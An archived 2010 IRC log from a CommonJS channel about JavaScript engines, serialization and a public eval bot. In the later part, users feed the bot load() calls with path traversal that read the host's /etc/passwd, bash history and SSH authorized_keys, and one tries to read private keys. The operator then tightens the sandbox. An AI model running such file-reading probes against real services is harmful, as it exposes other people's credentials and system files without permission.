Mochabot log for 2010-02-09 - Server-Side Javascript IRC channel: join #serverjs on irc.freenode.net

Mochabot log - CommonJS IRC channel: #commonjs on irc.freenode.net

2010-02-09:

[2:35] <Dantman> Tch... Stupid wget... Sends a HTTP/1.0 GET but uses a Host: header.
[2:45] <inimino> Dantman: and Connection: keep-alive :-)
[2:55] <Dantman> Stupid Adobe AIR... it's worthless to me without SVG support which is already built into WebKit and would work fine if they just updated...
[3:04] <Dantman> heh... "Out of Firefox, Opera, Safari, Chrome, IE6?8, Appcelerator Titanium and Adobe AIR, only one doesn?t support Rapha?l. The fact that it isn?t IE 6 must be pretty embarrassing for Adobe?"
[3:04] <Dantman> That one really deserves a laugh
[3:05] <Dantman> Adobe may have just lost a potential app to one of it's competitors for that reason.
[3:05] <deanlandolt> Dantman: what incentive does Adobe have to push vector graphics forward outside of flash?
[3:06] <deanlandolt> they've bastards about svg, and have been so every since the macromedia buy
[3:10] <Dantman> *twitch* Appcelerator Titanium is open-source, and supports native things AIR doesn't? T_T If someone had touted that in comments, I would have taken a look at it earlier...
[3:10] <Dantman> Not to mention iPod, iPad, Android support
[5:00] <Dantman> Heh, Titanium's integration of JavaScript, Ruby, and Python in a way that you can execute functions from other languages is interesting.
[5:01] <Dantman> Looks like they have PHP too
[5:01] <Dantman> Desktop side though
[5:02] <Dantman> I'd love to see someone look at their code for that and publish a extension to PHP to embed js.
[5:45] <Dantman> Damn wait... this could be considered a use case for a commonjs implementation using JSCore
[6:40] <ondras> re
[6:40] <ondras> Wes--: by the way, how do you handle cyclic references with toSource() ?
[7:48] <tlrobinson_> Dantman: Narwhal has a JSCore engine
[7:49] <tlrobinson_> it could probably be bolted onto Titanium
[10:23] <ondras> http://dmitry.baranovskiy.com/post/91403200
[15:30] <Wes--> ondras: toSource() handles cyclic graphs automatically provided the cycles are referenced in plain JS Objects - it uses sharp-object notation
[15:45] <ondras> Wes--: well, the interesting part is when those are not plain js objects
[15:48] <ondras> Wes--: for instance, when the static factory method Obj.createFromData has to accept references as its arguments
[15:59] <Wes--> ondras: It is the responsibility of each object type to be able to represent itself properly with toSource. If you are making a custom object which can have a reference to itself, you will need to support sharp-object notation in your toSource method. IIUC.
[15:59] <Wes--> Personally I try to arrange it so my native objects wind up as leaves on my object graph, so that mozilla handles all the hard cases. :)
[16:00] <ashb> Wes--: isn't sharp obj a mozillaism?
[16:00] <ondras> Wes--: I think that I have a different case on my mind:
[16:00] <Wes--> That said, it might be possible to get toSource for "free" on certain types of objects by exposing a native enumerator; I haven't tried
[16:00] <ondras> Wes--: var obj = {}; var i1 = new MyFunc(obj); var i2 = new MyFunc(obj); [i1,i2].toSource();
[16:00] <Wes--> ashb: Maybe, but if it is, then there are some object graphs which simply cannot be represented with a toSource-like method
[16:01] <ashb> also as an alternative to "#1=#1#" is "(function(){ var a = {}; a.a = a; return a})()"
[16:01] <Wes--> Hmm, that's clever
[16:01] <ondras> Wes--: my question is, how do you create toSource for MyFunc in the scenario above
[16:01] <ashb> toSource itself is a mozilal extenion in fact
[16:01] <ashb> it doesn't appear in ECMA262
[16:02] <ondras> ashb: u evul function in json!!!11 :)
[16:02] <ashb> ondras: in json no.
[16:02] <Wes--> js> function MyFunc(o) {this.obj = o }
[16:02] <gbot2> Wes--: undefined
[16:02] <Wes--> js> var obj = {}; var i1 = new MyFunc(obj); var i2 = new MyFunc(obj); [i1,i2].toSource();
[16:02] <gbot2> Wes--: Error: ReferenceError: MyFunc is not defined
[16:02] <Wes--> [{obj:#1={}}, {obj:#1#}]
[16:02] <ashb> but toSource returns JS, not JSON
[16:02] <Wes--> right
[16:02] <Wes--> but it's handy as hell for serializing app state
[16:03] <Wes--> js> for(;;);
[16:03] <ashb> i'm ever quite sure what a stream handle should return for toSource tho
[16:03] <gbot2> Wes--: Timeout.
[16:03] <Wes--> damn, somebody fixed that
[16:03] <ashb> :)
[16:03] <ondras> Wes--: well, I expected you to create a custom toSource() ofr MyFunc...
[16:03] <ondras> *for
[16:04] <Wes--> js> require("fs-base").openRaw("/etc/passwd", { mode: write }).close();
[16:04] <gbot2> Wes--: Error: ReferenceError: require is not defined
[16:04] <ondras> :D
[16:04] <Wes--> ondras: That sounds like more thinking than I want to do this morning. :)
[16:04] <ondras> :)
[16:05] <Wes--> js> var a = new Array(10000000000000);
[16:05] <gbot2> Wes--: Error: RangeError: invalid array length
[16:05] <Wes--> js> var a = new Array(100000000000);
[16:05] <gbot2> Wes--: Error: RangeError: invalid array length
[16:05] <Wes--> oh come ON
[16:05] <Wes--> js> var a = []; for (;;) a.push(a);
[16:05] <gbot2> Wes--: Timeout.
[16:05] <ondras> js> var a = []; for (var p in this) a.push(p); a.join(", ");
[16:05] <gbot2> ondras: ""
[16:06] <Wes--> js> this.toSource();
[16:06] <gbot2> Wes--: "({})"
[16:06] <Wes--> js> global.toSource();
[16:06] <gbot2> Wes--: Error: ReferenceError: global is not defined
[16:06] <Wes--> js> eval(this.toSource());
[16:06] * ondras just wanted to try global :)
[16:06] <gbot2> Wes--: {}
[16:06] <MisterN> whose bot is this?
[16:06] <Wes--> I have no clue
[16:06] <ondras> 17:09 [freenode] -!- gbot2 [~bot@boshi.inimino.org]
[16:06] <ondras> 17:09 [freenode] -!- ircname : Joseph Pecoraro (BOT)
[16:06] <MisterN> inimino: your bot?
[16:06] <Wes--> js> help()
[16:06] <gbot2> Wes--: JavaScript-C 1.7.0 2007-10-03Command Usage Description======= ===== ===========version version([number]) Get or set JavaScript version number...
[16:07] <Wes--> Hm, old version of spidermonkey
[16:07] <Wes--> js> File;
[16:07] <gbot2> Wes--: Error: ReferenceError: File is not defined
[16:07] <Wes--> dang, no JS_HAS_FILE_OBJECT
[16:07] <ondras> what a surprise :)
[16:07] <MisterN> js> Array.__proto__
[16:07] <gbot2> MisterN: <function () { }>
[16:07] <Wes--> js> load()
[16:07] <gbot2> Wes--: undefined
[16:07] <MisterN> js> load
[16:07] <gbot2> MisterN: <function load() { [native code] }>
[16:07] <Wes--> ho ho
[16:07] <MisterN> load function exists
[16:07] <Wes--> js> load("/etc/passwd")
[16:07] <gbot2> Wes--: Error: SyntaxError: invalid label: /etc/passwd:1: root:x:0:0:root:/root:/bin/bash /etc/passwd:1: ........^
[16:07] <ondras> :DD
[16:07] <MisterN> wow.
[16:07] <Wes--> js> load("/etc/shadow")
[16:07] <gbot2> Wes--: Error: Error: can't open /etc/shadow: No such file or directory
[16:08] <Wes--> okay, user perms
[16:08] <Wes--> js> load("/etc/hostname")
[16:08] <gbot2> Wes--: Error: Error: can't open /etc/hostname: No such file or directory
[16:08] <ondras> js> load("~/.bash_history")
[16:08] <gbot2> ondras: Error: Error: can't open ~/.bash_history: No such file or directory
[16:08] <MisterN> inimino: you should sandbox it a bit better?
[16:08] <MisterN> js> load("/etc/passwd")
[16:08] <gbot2> MisterN: Error: SyntaxError: invalid label: /etc/passwd:1: root:x:0:0:root:/root:/bin/bash /etc/passwd:1: ........^
[16:08] <Wes--> js> load("/etc/resolv.conf")
[16:08] <gbot2> Wes--: Error: SyntaxError: illegal character: /etc/resolv.conf:1: # Generated by dhcpcd from eth0 /etc/resolv.conf:1: ^
[16:08] <Wes--> js> snarf
[16:08] <gbot2> Wes--: Error: ReferenceError: snarf is not defined
[16:08] <Wes--> damn, that's 1.8.0
[16:09] <ondras> js> load("~/.bashrc")
[16:09] <gbot2> ondras: Error: Error: can't open ~/.bashrc: No such file or directory
[16:09] <Wes--> ondras: ~ will not be expanded
[16:09] <ondras> ah
[16:09] <Wes--> js> load("/home")
[16:09] <gbot2> Wes--: undefined
[16:09] <MisterN> js> load(".bashrc")
[16:09] <gbot2> MisterN: Error: Error: can't open .bashrc: No such file or directory
[16:09] <Wes--> js> load("/user")
[16:09] <gbot2> Wes--: Error: Error: can't open /user: No such file or directory
[16:09] <MisterN> js> load("../.bashrc")
[16:09] <gbot2> MisterN: Error: SyntaxError: illegal character: ../.bashrc:1: # ~/.bashrc: executed by bash(1) for non-login shells. ../.bashrc:1: ^
[16:09] <Wes--> js> load("/home/inimo")
[16:09] <gbot2> Wes--: Error: Error: can't open /home/inimo: No such file or directory
[16:10] <Wes--> js> load("/home/inimimo")
[16:10] <gbot2> Wes--: Error: Error: can't open /home/inimimo: No such file or directory
[16:10] <ondras> js> load("../.bash_history")
[16:10] <gbot2> ondras: Error: SyntaxError: syntax error: ../.bash_history:2: cat >.ssh/authorized_keys ../.bash_history:2: .....^
[16:10] <MisterN> Wes--: just use ..
[16:10] <ondras> :}
[16:10] <inimino> hm...
[16:10] <Wes--> js> load(".profile")
[16:10] <gbot2> Wes--: Error: Error: can't open .profile: No such file or directory
[16:10] <Wes--> js> load("../.profile")
[16:10] <gbot2> Wes--: Error: SyntaxError: illegal character: ../.profile:1: #!/bin/echo 'You must source this file' ../.profile:1: ^
[16:10] <ondras> js> load("../.ssh/authorized_keys")
[16:10] <gbot2> ondras: Error: SyntaxError: missing ; before statement: ../.ssh/authorized_keys:1: ssh-dss AAAAB3NzaC1kc3MAAAIBAKEXjrdwe2tEJw9r04geCwlyYnWx617X2ox/2RVE49dxzjESrWQoawt2pP1jXAhPDFV4VcuJFat4scN+xFiSufOnvjf4SW5gzL/GBKFWy
[16:10] <MisterN> inimino: sorry for hacking your computer :)
[16:10] <Wes--> js> load("../.bash_history")
[16:10] <gbot2> Wes--: Error: SyntaxError: syntax error: ../.bash_history:2: cat >.ssh/authorized_keys ../.bash_history:2: .....^
[16:10] <inimino> Wes--: ok, point made
[16:10] <ondras> js> load("../.ssh/id_rsa")
[16:10] <gbot2> ondras: Error: Error: can't open ../.ssh/id_rsa: No such file or directory
[16:10] <ondras> js> load("../.ssh/id_dsa")
[16:10] <gbot2> ondras: Error: Error: can't open ../.ssh/id_dsa: No such file or directory
[16:10] <ondras> :)
[16:11] <Wes--> hahaha
[16:11] <MisterN> ondras: i almost wanted to try this too but that would have been too mean
[16:11] <inimino> rude
[16:11] <ondras> MisterN: I believe those cannot be actually used until they are o-r
[16:11] <ondras> so the chance for opening them is 0.001...
[16:12] <Wes--> No, it's more like broccoli in your teeth
[16:12] <MisterN> inimino: that kind of behaviour is to be expected in a room with more than 40 adults who really are still little kids :>
[16:12] <Wes--> You would rather your friends point it out than somebody else discover it who will use it for evil
[16:12] <MisterN> Wes--: yeah but id_rsa was unnecessary
[16:13] <Wes--> Although, ondras, actually pulling the ssh key was a bit too far
[16:13] * Wes-- nods
[16:13] <ondras> okay then, sorry :)
[16:13] <MisterN> i was tempted too, though
[16:13] <ondras> great power, I know
[16:13] <MisterN> i love broccoli
[16:14] <evilstreak> my bot went through this abuse when I put him into a channel of geeks
[16:14] <evilstreak> luckily they didn't find anything too destructive, and were only doing it to identify the exploits after which they helped me fix them
[16:16] <MisterN> geordi and the guy who runs codepad use pretty nice techniques to prevent such attacks
[16:17] <Wes--> FWIW if I were running a bot of this nature, I would either use only a clean global object (injecting code from C on load) or stick it in a chroot jail
[16:20] <MisterN> or both.
[16:20] <inimino> it's not even my bot, I just run it as a service to ##javascript
[16:21] <Wes--> *dude*
[16:21] <Wes--> Want a hand securing it?
[16:21] <inimino> should be marginally safer now.
[16:21] <inimino> Wes--: if you feel so moved, sure
[16:21] <inimino> I don't have a lot of time to mess with it
[16:21] <Wes--> inimino: Where is the code?
[16:21] <inimino> `source
[16:21] <gbot2> My source code is available at http://github.com/JosephPecoraro/jsircbot
[16:24] <Wes--> inimino: Wait, the bot is in ruby? I guess it calls the spidermonkey js shell as a sub process?
[16:24] <inimino> Wes--: yes
[16:25] <inimino> http://www.pastie.org/816497
[16:25] <inimino> actually that's the code I'm running now
[16:28] <Wes--> inimino: If you have a source distro of js1.7 on your box, you could rebuild it with slight mods to js.c -- remove anything like JS_DefineFunction(cx, glob....) and empty out the shell_functions[] array
[16:29] <Wes--> inimino: Also JS_DefineObject(cx, globl...)
[16:31] <inimino> Wes--: I just added everything I saw in the shell that looked dangerous on line 230
[16:32] <inimino> I'd like to get v8 and jsc working in the bot, but it's not a high priority
[16:32] <Wes--> inimino: Not idea, although, I have reservations about whitelists
[16:33] <Wes--> inimino: FWIW if you ever get GPSEE up and running locally I can spin up a trivial embedding which would drop right in
[16:33] <inimino> what's an embedding?
[16:59] <Wes--> inimino: application which hosts javascript
[17:03] <inimino> Wes--: ah
[22:19] <zumbrunn> your gbot2 exercises remind me of this: http://zumbrunn.com/mochazone/Shutdown-Day+the+Helma+way/ :-)

2010-02-09:

Logs by date :